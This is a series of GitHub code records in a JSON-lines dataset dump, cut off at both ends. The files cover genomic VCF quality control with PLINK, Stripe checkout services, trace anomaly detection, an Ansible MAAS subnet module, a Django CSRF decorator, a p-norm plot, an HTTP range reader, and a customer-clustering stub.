script to perform quality control on vcf files\r\n## usage:\r\n# 1. If using the --indep utility\r\n# ./QC_script.py -i [-m] [-maf] [-g] [-hw] [-f] [-s] [-ldp] [-indep_w] [-indep_s] [-indep_v]\r\n\r\n# 2. If using the --indep-pairwise utility\r\n# ./QC_script.py -i [-m] [-maf] [-g] [-hw] [-f] [-s] [-ldp] [-indep_w] [-indep_s] [-indep_t]\r\n\r\n\r\n# Example1: ./QC_script.py -i GC123.vcf -m 0.05 -maf 0.05 -g 0.1 -hw 0.00000001 -f 0.05 -s 0.1 -ldp i -indep_w 50 -indep_s 5 -indep_v 2\r\n# Example2: ./QC_script.py -i GC123.vcf -m 0.05 -maf 0.05 -g 0.1 -hw 0.00000001 -f 0.05 -s 0.1 -ldp ip -indep_w 50 -indep_s 5 -indep_t 0.5\r\n\r\nimport subprocess\r\nimport argparse\r\nimport os\r\n\r\nparser = argparse.ArgumentParser(description=\"Quality Control of Genomics files\")\r\nparser.add_argument(\"-i\", \"--input\", help=\"Name of the input file\", required=True)\r\nparser.add_argument(\"-m\", \"--m\", help=\"QC: Missing rate per person\") # 0.1\r\nparser.add_argument(\"-maf\", \"--maf\", help=\"QC: Allele frequency\") # 0.05\r\nparser.add_argument(\"-g\", \"--g\", help=\"QC: Missing rate per SNP\") # 0.1\r\nparser.add_argument(\"-hw\", \"--hw\", help=\"QC: Hardy-Weinberg Equilibrium\") # 0.0000001\r\nparser.add_argument(\"-f\", \"--f\", help=\"Family-wise QC: Mendel error rate\") # 0.05\r\nparser.add_argument(\"-s\", \"--s\", help=\"SNP-wise QC: Mendel error rate\") # 0.1\r\nparser.add_argument(\"-ldp\", \"--ldprune\", help=\"Choose between indep and indep-pairwise. Type 'i' or 'ip' respectively\") # 50\r\n\r\nparser.add_argument(\"-indep_w\", \"--indep_window\", help=\"window size for indep/indep-pairwise\") # 50\r\nparser.add_argument(\"-indep_s\", \"--indep_snp\", help=\"Number of SNPs to shift the window in indep/indep-pairwise\") # 5\r\nparser.add_argument(\"-indep_v\", \"--indep_vif\", help=\"VIF threshold for indep (only use if the indep option was selected)\") # 2\r\nparser.add_argument(\"-indep_t\", \"--indep_threshold\", help=\"r^2 threshold for indep-pairwise (only use if the indep-pairwise option was selected)\") # 0.5\r\n\r\nargs = parser.parse_args()\r\n\r\n# 1. Converting vcf to binary plink files\r\ndef vcf_to_plink(input):\r\n    subprocess.call([\"plink\", \"--vcf\", input, \"--make-bed\", \"--out\", input])\r\n\r\n\r\ndef quality_control(**kwargs):\r\n\r\n    # 2. Basic quality control\r\n    subprocess.call([\"plink\", \"--bfile\", args.input, \"--allow-no-sex\", \"--make-founders\", \"--make-bed\", \"--out\", \"basicQC\"])\r\n\r\n\r\n    # 3. 
QC: Missing rate per person (exclude individuals with too much missing genotype data)\r\n    subprocess.call([\"plink\", \"--bfile\", \"basicQC\", \"--mind\", kwargs.get(\"m\"), \"--make-bed\", \"--out\", \"mindQC\"])\r\n\r\n\r\n    # 4. QC: Allele frequency (exclude SNPs on the basis of MAF)\r\n    subprocess.call([\"plink\", \"--bfile\", \"mindQC\", \"--maf\", kwargs.get(\"maf\"), \"--make-bed\", \"--out\", \"mafQC\"])\r\n\r\n\r\n    # 5. QC: Missing rate per SNP (exclude SNPs based on missing genotype rate)\r\n    subprocess.call([\"plink\", \"--bfile\", \"mafQC\", \"--geno\", kwargs.get(\"g\"), \"--make-bed\", \"--out\", \"genoQC\"])\r\n\r\n\r\n    # 6. QC: Hardy-Weinberg Equilibrium (exclude markers that fail the Hardy-Weinberg test at a specified significance threshold)\r\n    subprocess.call([\"plink\", \"--bfile\", \"genoQC\", \"--hwe\", kwargs.get(\"hw\"), \"--make-bed\", \"--out\", \"hweQC\"])\r\n\r\n\r\n    # 7. QC: Mendel error rate (for family-based data only, to exclude individuals and/or markers on the basis of the Mendel error rate)\r\n    subprocess.call([\"plink\", \"--bfile\", \"hweQC\", \"--me\", kwargs.get(\"f\"), kwargs.get(\"s\"), \"--make-bed\", \"--out\", \"mendelQC\"])\r\n\r\n\r\n\r\n# 8. LD pruning of the quality-controlled data\r\ndef LD_pruning_indep(**kwargs):\r\n    ## --indep prunes based on the variance inflation factor (VIF), recursively removing SNPs within a sliding window\r\n    subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--indep\", kwargs.get(\"indep_w\"), kwargs.get(\"indep_snp\"), kwargs.get(\"indep_vif\")])\r\n    with open(\"plink.log\", \"r\") as fp:\r\n        for line in fp:\r\n            if line.startswith(\"Warning: Skipping --indep\"):\r\n                # pruning couldn't be done; possible reason: fewer than 2 founders\r\n                return 0\r\n\r\n    # if there is no warning, pruning has been done\r\n    os.system(\"plink --bfile mendelQC --extract plink.prune.in --make-bed --out pruned_data\")\r\n    return 1\r\n\r\ndef LD_pruning_indep_pair(**kwargs):\r\n    ## --indep-pairwise is similar, except it is based only on pairwise genotypic correlation\r\n    subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--indep-pairwise\", kwargs.get(\"indep_w\"), kwargs.get(\"indep_snp\"), kwargs.get(\"indep_threshold\")])\r\n    with open(\"plink.log\", \"r\") as fp:\r\n        for line in fp:\r\n            if line.startswith(\"Warning: Skipping --indep-pairwise\"):\r\n                # pruning couldn't be done; possible reason: fewer than 2 founders\r\n                return 0\r\n\r\n    os.system(\"plink --bfile mendelQC --extract plink.prune.in --make-bed --out pruned_data\")\r\n    return 1\r\n\r\n\r\n\r\n# 9. Converting the pruned file back to vcf\r\ndef plink_to_vcf(input, result):\r\n    out_file = input.split(\".\")[0]+\"_pruned\"\r\n\r\n    if result == 0:  # LD pruning couldn't be performed --> make the final vcf from the mendelQC step\r\n        subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--recode\", \"vcf\", \"--out\", out_file])\r\n\r\n    else:  # make the final vcf from the pruned file\r\n        subprocess.call([\"plink\", \"--bfile\", \"pruned_data\", \"--recode\", \"vcf\", \"--out\", out_file])\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    vcf_to_plink(args.input)\r\n\r\n    quality_control(m=str(args.m), maf=str(args.maf), g=str(args.g), hw=str(args.hw), f=str(args.f), s=str(args.s))\r\n\r\n    if args.ldprune == 'i':\r\n        result = LD_pruning_indep(indep_w=args.indep_window, indep_snp=args.indep_snp, indep_vif=args.indep_vif)\r\n\r\n    else:\r\n        result = LD_pruning_indep_pair(indep_w=args.indep_window, indep_snp=args.indep_snp, indep_threshold=args.indep_threshold)\r\n\r\n    
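# result is 1 if LD pruning produced pruned_data, 0 if plink skipped pruning\r\n    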
plink_to_vcf(args.input, result)\r\n\r\n print(\"Done, Exiting!!!\")\r\n\r\n","repo_name":"mariamnawaz1/VCF-Quality-Control","sub_path":"QC_script.py","file_name":"QC_script.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"8029248","text":"from typing import Any\nimport stripe\nfrom dependency_injector.wiring import Provide, inject, Closing\nfrom django.http import HttpRequest\n\nfrom stripe_project.containers import StripeContainer\nfrom stripe_app.stripe import StripeAPI\n\n\n@inject\ndef create_session_for_item(\n request: HttpRequest,\n item: dict[str, str | int],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.checkout.Session:\n session = stripe_api.create_session(request, item)\n return session\n\n\n@inject\ndef create_payment_for_item(\n item: dict[str, str | int],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.PaymentIntent:\n session = stripe_api.create_payment_intent(item[\"price\"])\n return session\n\n\n@inject\ndef create_session_for_order(\n request: HttpRequest,\n order: dict[str, Any],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.checkout.Session:\n discounts = None\n if not all(order[\"discount\"][field] is None for field in order[\"discount\"]):\n coupon = stripe_api.create_coupon(data=order[\"discount\"])\n discounts = [{\"coupon\": f\"{coupon.id}\"}]\n tax = None\n if not all(order[\"tax\"][field] is None for field in order[\"tax\"]):\n tax = stripe_api.create_tax(data=order[\"tax\"])\n session = stripe_api.create_session(\n request, order[\"items\"], discounts=discounts, tax=tax\n )\n return session\n\n\n@inject\ndef create_payment_for_order(\n order: dict[str, Any],\n stripe_api: StripeAPI = Closing[Provide[StripeContainer.stripe_session]],\n) -> stripe.PaymentIntent:\n price = order[\"unit_amount\"]\n if order[\"tax\"][\"percentage\"]:\n price += price * (order[\"tax\"][\"percentage\"] / 100)\n if order[\"discount\"][\"discount_value\"]:\n price -= price * order[\"discount\"][\"discount_value\"] / 100\n session = stripe_api.create_payment_intent(price)\n return session\n","repo_name":"Kimiyori/test-stripe","sub_path":"src/stripe_app/services/stripe_services.py","file_name":"stripe_services.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"71178435475","text":"\n\"\"\"\nDynamic Streaming Parser\nAuthor: Dingwen Tao (ustc.dingwentao@gmail.com)\nCreate: April, 2018\nModified: June, 2018\n\"\"\"\n\n# prog_names is the indexed set of program names in the attributes\n# comm_ranks is the MPI rank\n# threads is the thread ID (rank)\n# event_types is the indexed set of event types in the attributes\n# func_names is the indexed set of timer names in the attributes\n# counters is the indexed set of counter names in the attributes\n# event_types_comm is the indexed set of event types related to communication in the attributes\n# tag is the MPI tag\n# partner is the other side of a point-to-point communication\n# num_bytes is the amount of data sent\n\nfrom collections import deque as dq\nfrom collections import Counter as ct\nimport pickle\nimport itertools\nimport adios as ad\nimport numpy as np\nimport scipy.io as sio\nimport configparser\nimport MiLOF\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neighbors import 
LocalOutlierFactor\n\n\ndef Parser(configFile):\n\tmethod = \"BP\"\n\tinit = \"verbose=3;\"\n\n\t# read parameters from configuration file\n\tconfig = configparser.ConfigParser()\n\tconfig.read(configFile)\n\tin_bp_file = config['Parser']['InputBPFile'] # input bp file path\n\tprov_db_path = config['Parser']['ProvDBPath'] # provenance output database path\n\tqueue_size = int(config['Parser']['QueueSize']) # provenance data size\n\tint_func_num = int(config['Parser']['InterestFuncNum']) # interested function size\n\n\t# initialize adios streaming mode\n\tad.read_init(method, parameters=init)\n\tfin = ad.file(in_bp_file, method, is_stream=True, timeout_sec=10.0)\n\tfout = open(prov_db_path, \"wb\")\n\n\t# read attributes\n\tdb = dq(maxlen=queue_size)\n\tname = np.array(['prog_names', 'comm_ranks', 'threads', 'event_types', 'func_names', 'counters', 'counter_value', 'event_types_comm', 'tag', 'partner', 'num_bytes', 'timestamp']).reshape(1, 12)\n\tattr = fin.attr\n\tnattrs = fin.nattrs\n\tattr_name = list(fin.attr)\n\tattr_value = np.empty(nattrs, dtype=object)\n\tnum_func = 0\n\tfunc_name = []\n\tfor i in range(0, len(attr_name)):\n\t\tattr_value[i] = attr[attr_name[i]].value\n\t\t# count function number and names\n\t\tif attr_name[i].startswith('timer'):\n\t\t\tnum_func = num_func + 1\n\t\t\tfunc_name.append(attr_value[i])\n\t\tif attr_name[i].startswith('event_type'):\n\t\t\tprint(attr_value[i])\n\tattr_name = np.array(attr_name)\n\tfunc_name = np.array(func_name)\n\n\ti = 0\n\ttotal_timestep = 0\n\tanomaly_indices = []\n\twhile True:\n\t\tprint(\">>> step:\", i)\n\n\t\tvname = \"event_timestamps\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tevent = var.read(nsteps=num_steps)\n\t\t\tdata_event = np.zeros((event.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_event[:, 0:5] = event[:, 0:5]\n\t\t\tdata_event[:, 11] = event[:, 5]\n\t\t\tdata_step = data_event\n\t\t\t# count most common functions\n\t\t\tint_func = ct(data_event[:, 4]).most_common(int_func_num) # e.g., [(16, 14002), (15, 14000), (13, 6000),...]\n\n\t\tvname = \"counter_values\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tcounter = var.read(nsteps=num_steps)\n\t\t\tdata_counter = np.zeros((counter.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_counter[:, 0:3] = counter[:, 0:3]\n\t\t\tdata_counter[:, 5:7] = counter[:, 3:5]\n\t\t\tdata_counter[:, 11] = counter[:, 5]\n\t\t\tdata_step = np.concatenate((data_step, data_counter), axis=0)\n\n\t\tvname = \"comm_timestamps\"\n\t\tif vname in fin.vars:\n\t\t\tvar = fin.var[vname]\n\t\t\tnum_steps = var.nsteps\n\t\t\tcomm = var.read(nsteps=num_steps)\n\t\t\tdata_comm = np.zeros((comm.shape[0], 12), dtype=object) + np.nan\n\t\t\tdata_comm[:, 0:4] = comm[:, 0:4]\n\t\t\tdata_comm[:, 8:11] = comm[:, 4:7]\n\t\t\tdata_comm[:, 11] = comm[:, 7]\n\t\t\tdata_step = np.concatenate((data_step, data_comm), axis=0)\n\n\t\t# sort data in this step by timestamp\n\t\tdata_step = data_step[data_step[:, 11].argsort()]\n\n\t\tif i == 0:\n\t\t\tdata_global = data_step\n\t\telse:\n\t\t\tdata_global = np.concatenate((data_global, data_step), axis=0)\n\n\t\t# lauch anomaly detection\n\t\tanomaly_flag = False\n\n\t\t# dynamic interest list\n\t\tif len(int_func) < 3:\n\t\t\tprint (\"Most interested function:\\n\", func_name[int_func[0][0]])\n\t\telse:\n\t\t\tprint (\"Most three interested functions:\\n\", func_name[int_func[0][0]], \"\\n\", func_name[int_func[1][0]], \"\\n\", func_name[int_func[2][0]])\n\n\t\t# 
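note: the function and event-type ids used below (function 21 = adios_close; event types 0/1 = entry/exit) are hard-coded for this trace, as the TODO markers indicate\n\t\t# 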
matching data\n\t\tglobal_index = (np.arange(data_step.shape[0]) + total_timestep).reshape(data_step.shape[0], 1)\n\t\tdata_step = np.append(data_step, global_index, axis=1)\n\t\tfunc_data = data_step[data_step[:, 4]==21] # 21 is adios_close, TODO\n\t\tentry_data = func_data[func_data[:, 3]==0] # 0 is entry in the current data, TODO\n\t\texit_data = func_data[func_data[:, 3]==1] # TODO\n\n\t\t# generating streaming data in terms of one function\n\t\tdatastream = []\n\t\tfor j in range(0, entry_data.shape[0]):\n\t\t\tfor k in range(0, exit_data.shape[0]):\n\t\t\t\tif np.array_equal(entry_data[j, 0:3], exit_data[k, 0:3]):\n\t\t\t\t\tentry_time = entry_data[j,11]\n\t\t\t\t\texec_time = exit_data[k, 11] - entry_data[j, 11]\n\t\t\t\t\tdatastream += [[entry_time, exec_time]]\n\t\t\t\t\tbreak\n\t\tdatastream = np.array(datastream)\n\n\t\t# anomaly detection\n\t\tif (datastream.shape[0]):\n\t\t\tscaler = MinMaxScaler()\n\t\t\tscaler.fit(datastream)\n\t\t\tdatastream = scaler.transform(datastream)\n\t\t\t# Should call MILOF API, but here for simplicity, call LOF directly\n\t\t\tclf = LocalOutlierFactor(algorithm=\"kd_tree\", metric='euclidean')\n\t\t\tanomalies = entry_data[clf.fit_predict(datastream)==-1]\n\t\t\tif anomalies.shape[0]:\n\t\t\t\tanomaly_indices.extend(anomalies[:, -1].tolist())\n\t\t\t\tanomaly_flag = True\n\n\t\t# add or dump queue\n\t\tif anomaly_flag:\n\t\t\t# dump queue to file\t\n\t\t\tdb.appendleft(attr_value)\n\t\t\tdb.appendleft(attr_name)\n\t\t\tdb.appendleft(nattrs)\n\t\t\tprint(\">>> Identified anomalies and dump data to binary.\")\n\t\t\tprint(\">>> Serialization ...\")\n\t\t\tpickle.dump(db, fout)\n\t\t\t# db[0]: the number of attributes\n\t\t\t# db[1]: the names of attributes\n\t\t\t# db[2]: the values of attributes\n\t\t\t# from db[3]: the trace data\n\t\telse:\n\t\t\t# add data to queue\n\t\t\tdb.extend(data_step)\n\n\t\tprint(\"Size of current timestep =\", data_step.shape[0])\n\t\ttotal_timestep += data_step.shape[0]\n\t\tprint(\"Size of total timestep = \", total_timestep)\n\n\t\tprint(\">>> Advance to next step ... 
\")\n\t\tif (fin.advance() < 0):\n\t\t\tbreak\n\n\t\ti += 1\n\n\tfin.close()\n\tfout.close()\n\n\tprint(\">>> Complete passing data.\")\n\tprint(\">>> Test of deserialization.\")\n\tprint(\">>> Load data ...\")\n\tfin = open(prov_db_path, \"rb\")\n\tdb2 = pickle.load(fin)\n\tprint(\">>> Passed test of deserialization.\")\n\n\tprint(\"\\n**** Print info ****\")\n\tprint(\">>> Number of attributes =\", db2[0])\n\tprint(\">>> First 20 Names of attributes =\", db2[1][0:20])\n\tprint(\">>> First 20 Values of attributes =\", db2[2][0:20])\n\tprint(\">>> First 20 trace data =\", np.array(list(itertools.islice(db2, 3, 20))))\n\tprint(\">>> Indices of anomalies in terms of entry:\", anomaly_indices)\n\tfin.close()\n\t\n\timport json\n\tfile_path = \"data.json\"\n\twith open(file_path, 'w') as outfile:\n\t\tjson.dump(data_global.tolist(), outfile)\n\toutfile.close()\n\t\n\tfile_path = \"anomaly.json\"\n\twith open(file_path, 'w') as outfile:\n\t\tjson.dump(anomaly_indices, outfile)\n\toutfile.close()\n","repo_name":"dingwentao/MILOF","sub_path":"lib/strmParser.py","file_name":"strmParser.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"84"} +{"seq_id":"11180543282","text":"DOCUMENTATION = '''\n---\nmodule: maas_subnet\nshort_description: Manage MAAS Clusters Interfaces\noptions:\n maas:\n description:\n - URL of MAAS server\n default: http://localhost/MAAS/api/1.0/\n key:\n description:\n - MAAS API key\n required: yes\n name:\n description:\n - name of the subnet\n required: yes\n space:\n description:\n - network space of the subnet\n dns_servers:\n description:\n - dns servers for the subnet\n gateway_ip:\n description:\n - gateway IP for the subnet\n cidr:\n description:\n - cidr for the subnet\n state:\n description:\n - possible states for this subnet\n choices: ['present', 'absent', 'query']\n default: present\n\nrequirements: [ipaddress, requests_oauthlib, maasclient]\nauthor: David Bainbridge\n'''\n\nEXAMPLES = '''\nexamples:\n maas_subnet:\n maas: http://my.maas.server.com/MAAS/api/1.0/\n key: 'xBvr9dx5k7S52myufC:fqBXV7hJgXegNZDw9c:K8hsmL47XjAppfQy2pDVW7G49p6PELgp'\n name: MySubnet\n state: present\n\n maas_subnet:\n maas: http://my.maas.server.com/MAAS/api/1.0/\n key: 'xBvr9dx5k7S52myufC:fqBXV7hJgXegNZDw9c:K8hsmL47XjAppfQy2pDVW7G49p6PELgp'\n name: MyDeadSubnet\n state: absent\n'''\n\nimport sys\nimport json\nimport ipaddress\nimport requests\nimport string\nfrom maasclient.auth import MaasAuth\nfrom maasclient import MaasClient\n\ndebug = []\n\n# For some reason the maasclient doesn't provide a put method. 
So\n# we will add it here\ndef put(client, url, params=None):\n    return requests.put(url=client.auth.api_url + url,\n                        auth=client._oauth(), data=params)\n\n# Attempt to interpret the given value as a JSON object; if that fails\n# just return it as a string\ndef string_or_object(val):\n    try:\n        return json.loads(val)\n    except:\n        return val\n\n# Return a copy of the given dictionary with any `null` valued entries\n# removed\ndef remove_null(d_in):\n    d = d_in.copy()\n    to_remove = []\n    for k in d.keys():\n        if d[k] == None:\n            to_remove.append(k)\n    for k in to_remove:\n        del d[k]\n    return d\n\n# Removes keys from a dictionary using either an include or an\n# exclude filter. The change happens in place: the given dictionary\n# is modified.\ndef filter(filter_type, d, keys):\n    if filter_type == 'include':\n        for k in d.keys():\n            if k not in keys:\n                d.pop(k, None)\n    else:\n        for k in d.keys():\n            if k in keys:\n                d.pop(k, None)\n\n# Converts a subnet structure with names for the vlan and space to their\n# ID equivalents that can be used in a REST call to MAAS\ndef convert(maas, subnet):\n    copy = subnet.copy()\n    copy['space'] = get_space(maas, subnet['space'])['id']\n    fabric_name, vlan_name = string.split(subnet['vlan'], ':', 1)\n    fabric = get_fabric(maas, fabric_name)\n    copy['vlan'] = get_vlan(maas, fabric, vlan_name)['id']\n    return copy\n\n# replaces the expanded VLAN object with a unique identifier of\n# `fabric`:`name`\ndef simplify(subnet):\n    copy = subnet.copy()\n    if 'dns_servers' in copy.keys() and type(copy['dns_servers']) == list:\n        copy['dns_servers'] = \",\".join(copy['dns_servers'])\n    if subnet['vlan'] and type(subnet['vlan']) == dict:\n        copy['vlan'] = \"%s:%s\" % (subnet['vlan']['fabric'], subnet['vlan']['name'])\n    return copy\n\n# Determine if two dictionaries are different\ndef different(have, want):\n    have_keys = have.keys()\n    for key in want.keys():\n        if (key in have_keys and want[key] != have[key]) or key not in have_keys:\n            debug.append({\"have\": have, \"want\": want, \"key\": key})\n            return True\n    return False\n\n# Get a space object from MAAS based on its name\ndef get_space(maas, name):\n    res = maas.get('/spaces/')\n    if res.ok:\n        for space in json.loads(res.text):\n            if space['name'] == name:\n                return space\n    return None\n\n# Get a fabric object from MAAS based on its name\ndef get_fabric(maas, name):\n    res = maas.get('/fabrics/')\n    if res.ok:\n        for fabric in json.loads(res.text):\n            if fabric['name'] == name:\n                return fabric\n    return None\n\n# Get a VLAN object from MAAS based on its name\ndef get_vlan(maas, fabric, name):\n    res = maas.get('/fabrics/%d/vlans/' % fabric['id'])\n    if res.ok:\n        for vlan in json.loads(res.text):\n            if vlan['name'] == name:\n                return vlan\n    return None\n\n# Get a subnet from MAAS using its name; if not found return None\ndef get_subnet(maas, name):\n    res = maas.get('/subnets/')\n    if res.ok:\n        for subnet in json.loads(res.text):\n            if subnet['name'] == name:\n                return simplify(subnet)\n    return None\n\n# Create a subnet based on the value given\ndef create_subnet(maas, subnet):\n    merged = subnet.copy()\n    # merged['op'] = 'new'\n    res = maas.post('/subnets/', convert(maas, merged))\n    if res.ok:\n        return { 'error': False, 'status': get_subnet(maas, merged['name']) }\n    return { 'error': True, 'status': string_or_object(res.text) }\n\n# Delete a subnet based on its name\ndef delete_subnet(maas, name):\n    res = maas.delete('/subnets/%s/' % name)\n    if res.ok:\n        return { 'error': False }\n    return { 'error': True, 'status': string_or_object(res.text) }\n\ndef update_subnet(maas, 
have, want):\n    merged = have.copy()\n    merged.update(want)\n    res = put(maas, '/subnets/%s/' % merged['id'], convert(maas, merged))\n    if res.ok:\n        return { 'error': False, 'status': get_subnet(maas, merged['name']) }\n    return { 'error': True, 'status': string_or_object(res.text) }\n\ndef main():\n    module = AnsibleModule(\n        argument_spec = dict(\n            maas=dict(default='http://localhost/MAAS/api/1.0/'),\n            key=dict(required=True),\n            name=dict(required=True),\n            space=dict(required=False),\n            dns_servers=dict(required=False),\n            gateway_ip=dict(required=False),\n            cidr=dict(required=False),\n            state=dict(default='present', choices=['present', 'absent', 'query'])\n        ),\n        supports_check_mode = False\n    )\n\n    maas = module.params['maas']\n    key = module.params['key']\n    state = module.params['state']\n\n    # Construct a sparsely populated desired state\n    desired = remove_null({\n        'name': module.params['name'],\n        'space': module.params['space'],\n        'dns_servers': module.params['dns_servers'],\n        'gateway_ip': module.params['gateway_ip'],\n        'cidr': module.params['cidr'],\n    })\n\n    # Authenticate to MAAS\n    auth = MaasAuth(maas, key)\n    maas = MaasClient(auth)\n\n    # Attempt to get the subnet from MAAS\n    subnet = get_subnet(maas, desired['name'])\n\n    # Actions if the subnet does not currently exist\n    if not subnet:\n        if state == 'query':\n            # If this is a query, report that it was not found\n            module.exit_json(changed=False, found=False)\n        elif state == 'present':\n            # If this should be present, then attempt to create it\n            res = create_subnet(maas, desired)\n            if res['error']:\n                module.fail_json(msg=res['status'])\n            else:\n                module.exit_json(changed=True, subnet=res['status'])\n        else:\n            # If this should be absent, then we are done and in the desired state\n            module.exit_json(changed=False)\n\n        # Done with the subnet-does-not-exist actions\n        return\n\n    # Actions if the subnet does exist\n    if state == 'query':\n        # If this is a query, return the subnet\n        module.exit_json(changed=False, found=True, subnet=subnet)\n    elif state == 'present':\n        # If we want this to exist, check whether it is different and\n        # needs to be updated\n        if different(subnet, desired):\n            res = update_subnet(maas, subnet, desired)\n            if res['error']:\n                module.fail_json(msg=res['status'])\n            else:\n                module.exit_json(changed=True, subnet=res['status'], debug=debug)\n        else:\n            # No differences, so nothing to change\n            module.exit_json(changed=False, subnet=subnet)\n    else:\n        # If we don't want this subnet, then delete it\n        res = delete_subnet(maas, subnet['name'])\n        if res['error']:\n            module.fail_json(msg=res['status'])\n        else:\n            module.exit_json(changed=True, subnet=subnet)\n\n# this is magic, see lib/ansible/module_common.py\n#<<INCLUDE_ANSIBLE_MODULE_COMMON>>\nif __name__ == '__main__':\n    main()\n","repo_name":"opencord/maas","sub_path":"library/maas_subnet.py","file_name":"maas_subnet.py","file_ext":"py","file_size_in_byte":8516,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"84"} +{"seq_id":"39409336035","text":"from django.utils.decorators import available_attrs, decorator_from_middleware\nfrom ..middleware.access import AccessViewMiddleware\nfrom functools import wraps\n\ncsrf_or_api_token_protect = decorator_from_middleware(AccessViewMiddleware)\ncsrf_or_api_token_protect.__name__ = 'csrf_or_api_token_protect'\ncsrf_or_api_token_protect.__doc__ = \"\"\"\nUse this decorator to ensure that a view sets a CSRF cookie, whether or not it\nuses the csrf_token template tag, or the CsrfViewMiddleware is used.\n\"\"\"\n\n\ndef csrf_exempt(view_func):\n    \"\"\"\n    
Marks a view function as being exempt from the CSRF view protection.\n \"\"\"\n\n # We could just do view_func.csrf_exempt = True, but decorators\n # are nicer if they don't have side-effects, so we return a new\n # function.\n def wrapped_view(*args, **kwargs):\n return view_func(*args, **kwargs)\n\n wrapped_view.csrf_exempt = True\n return wraps(view_func, assigned=available_attrs(view_func))(wrapped_view)\n","repo_name":"EndyKaufman/django-postgres-angularjs-blog","sub_path":"app/account/decorators/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"28713186033","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 27 10:47:17 2017\n\n@author: Alexandru Meterez\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\ndef Circle(x, y, p):\n return (pow(pow(abs(x), p) + pow(abs(y), p), 1/p))\n\nxx = np.linspace(-2, 2, 400)\nyy = np.linspace(-2, 2, 400)\n[X, Y] = np.meshgrid(xx, yy)\nZ = Circle(X, Y, 1)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nfig.subplots_adjust(left = 0.25, bottom = 0.25)\nline = ax.contour(X, Y, Z, [1])\n\n#Adding the sliders\nnormSliderAx = fig.add_axes([0.25, 0.15, 0.65, 0.03])\nnormSlider = Slider(normSliderAx, 'p-norm', 1, 30, valinit = 1)\ndef sliders_on_changed(val):\n ax.clear()\n line = []\n line = ax.contour(X, Y, Circle(X, Y, val), [1])\n \nnormSlider.on_changed(sliders_on_changed)\nplt.show()","repo_name":"alexandrumeterez/numericalanalysis","sub_path":"unitcircles/unitcircles.py","file_name":"unitcircles.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72737269396","text":"import urllib2\n\nimport staccato.protocols.interface as base\nfrom staccato.common import exceptions\n\n\nclass HttpProtocol(base.BaseProtocolInterface):\n\n def __init__(self, service_config):\n self.conf = service_config\n\n def _validate_url(self, url_parts):\n pass\n\n def _parse_opts(self, opts):\n return opts\n\n def new_write(self, dsturl_parts, dst_opts):\n opts = self._parse_opts(dst_opts)\n return opts\n\n def new_read(self, srcurl_parts, src_opts):\n opts = self._parse_opts(src_opts)\n return opts\n\n def get_reader(self, url_parts, writer, monitor, source_opts, start=0,\n end=None, **kwvals):\n self._validate_url(url_parts)\n\n return HttpReadConnection(url_parts,\n writer,\n monitor,\n start=start,\n end=end,\n **kwvals)\n\n def get_writer(self, url_parts, dest_opts, checkpointer, **kwvals):\n raise exceptions.StaccatoNotImplementedException(\n _('The HTTP protocol is read only'))\n\n\nclass HttpReadConnection(base.BaseReadConnection):\n\n def __init__(self,\n url_parts,\n writer,\n monitor,\n start=0,\n end=None,\n buflen=65536,\n **kwvals):\n whole_url = url_parts.geturl()\n\n req = urllib2.Request(whole_url)\n range_str = 'bytes=%sd-' % start\n if end and end > start:\n range_str = range_str + str(end)\n req.headers['Range'] = range_str\n self.h_con = urllib2.urlopen(req)\n self.pos = start\n self.eof = False\n self.writer = writer\n self.buflen = buflen\n self.monitor = monitor\n\n def _read(self, buflen):\n buf = self.h_con.read(buflen)\n if not buf:\n return True, 0\n self.writer.write(buf, self.pos)\n\n self.pos = self.pos + len(buf)\n return False, len(buf)\n\n def process(self):\n try:\n while not self.monitor.is_done() and not self.eof:\n self.eof, read_len = 
self._read(self.buflen)\n        finally:\n            self.h_con.close()\n","repo_name":"buzztroll/staccato","sub_path":"staccato/protocols/http/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"21887590635","text":"#Jon Ander Martin, Dani Lazaro, Almudena Chapa\n\n#Clustering algorithm for customer allocation\n#The vehicles are the centers of the clusters\n#Setting the waiting time of the vehicle to the highest one of the customers in the pool...\n    #... gives more weight to the ones that have been in the queue the longest\nimport numpy as np\n\ndef get_customers(vehicle_position, customer_list, k):\n    \"\"\"\n    get_customers selects the k customers closest to a vehicle from the\n    customer pool\n\n    Parameters\n    ----------\n    vehicle_position : LIST\n        [x,y] position of the vehicle.\n    customer_list : LIST\n        [customer_1, customer_2, ...].\n    k : INT\n        Number of customers to pick from customer_list.\n\n    Returns\n    -------\n    selected_customers : LIST\n        List with selected customers' vectors.\n    new_pool : LIST\n        list of customers from customer_list that have not been selected by\n        get_customers.\n\n  